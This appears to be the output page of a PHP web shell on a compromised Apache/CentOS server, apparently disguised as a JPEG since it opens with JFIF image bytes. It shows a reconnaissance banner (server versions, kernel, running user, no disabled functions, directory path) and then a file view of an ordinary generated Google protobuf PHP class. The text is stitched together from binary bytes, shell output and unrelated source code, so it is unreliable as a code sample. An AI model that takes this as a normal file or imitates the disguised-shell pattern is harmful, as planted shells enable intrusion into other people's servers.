���� JFIF �� � ( %"1"%)+...383,7(-.-
![]() Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20 System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 User : apache ( 48) PHP Version : 7.4.20 Disable Function : NONE Directory : /var/www/html/st2/vendor/google/gax/src/Iam/V1/Logging/ |
<?php # Generated by the protocol buffer compiler. DO NOT EDIT! # source: google/iam/v1/logging/audit_data.proto namespace Google\Iam\V1\Logging; use Google\Protobuf\Internal\GPBType; use Google\Protobuf\Internal\RepeatedField; use Google\Protobuf\Internal\GPBUtil; /** * Audit log information specific to Cloud IAM. This message is serialized * as an `Any` type in the `ServiceData` message of an * `AuditLog` message. * * Generated from protobuf message <code>google.iam.v1.logging.AuditData</code> */ class AuditData extends \Google\Protobuf\Internal\Message { /** * Policy delta between the original policy and the newly set policy. * * Generated from protobuf field <code>.google.iam.v1.PolicyDelta policy_delta = 2;</code> */ private $policy_delta = null; public function __construct() { \GPBMetadata\Google\Iam\V1\Logging\AuditData::initOnce(); parent::__construct(); } /** * Policy delta between the original policy and the newly set policy. * * Generated from protobuf field <code>.google.iam.v1.PolicyDelta policy_delta = 2;</code> * @return \Google\Cloud\Iam\V1\PolicyDelta */ public function getPolicyDelta() { return $this->policy_delta; } /** * Policy delta between the original policy and the newly set policy. * * Generated from protobuf field <code>.google.iam.v1.PolicyDelta policy_delta = 2;</code> * @param \Google\Cloud\Iam\V1\PolicyDelta $var * @return $this */ public function setPolicyDelta($var) { GPBUtil::checkMessage($var, \Google\Cloud\Iam\V1\PolicyDelta::class); $this->policy_delta = $var; return $this; } }